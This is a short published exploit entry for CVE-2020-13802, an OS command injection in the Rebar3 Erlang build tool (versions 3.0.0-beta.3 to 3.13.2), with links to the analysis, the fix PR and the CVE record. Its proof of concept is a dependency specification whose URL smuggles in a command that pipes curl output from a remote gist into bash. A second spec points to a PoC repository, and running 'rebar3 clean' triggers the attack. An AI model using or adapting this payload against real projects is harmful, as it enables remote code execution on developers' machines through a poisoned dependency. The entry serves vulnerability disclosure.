Exploit for Rebar3 3.13.2 Command Injection CVE-2020-13802

## https://sploitus.com/exploit?id=PACKETSTORM:159027
# Exploit Title: Rebar3 - OS command injection  
# Date: 2020-06-03  
# Exploit Author: Alexey Pronin （vulnbe）  
# Vendor Homepage: https://rebar3.org  
# Software Link: https://github.com/erlang/rebar3  
# Versions affected: 3.0.0-beta.3 - 3.13.2  
# CVE: CVE-2020-13802  
  
1. Description:  
----------------------  
  
Rebar3 versions 3.0.0-beta.3 to 3.13.2 are vulnerable to OS command injection via URL parameter of dependency specification.  
  
2. Proof of Concept:  
----------------------  
  
* Add dependency with any of the following specification:  
  
{  
'dephelper', ".*", {   
hg, "https://github.com/vulnbe/poc-rebar3-helper.git?repo=main&threadId=19:428af44abb014e318e7d225a4a88acc2@thread.tacv2&ctx=channel|curl\t-fsSL\thttps://gist.githubusercontent.com/vulnbe/6e5ec8fae3bdbee8e5f11f15c1462e48/raw/94616f0ee52935fda458c889d6f686958c79a2c8/poc.sh|bash\t-|git\tclone\thttps://github.com/vulnbe/poc-rebar3-helper.git",   
"dephelper"}  
}  
  
or   
  
{  
'poc_rebar3', ".*", {   
git, "https://github.com/vulnbe/poc-rebar3.git"   
}  
}  
  
* Execute command: rebar3 clean  
  
References  
----------------------  
* [Rebar3 vulnerability analysis](https://vuln.be/post/rebar3-command-injection/)  
* [POC](https://github.com/vulnbe/poc-rebar3.git)  
* [Vulnerability remediation PR](https://github.com/erlang/rebar3/pull/2302)  
* [CVE-2020-13802](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13802)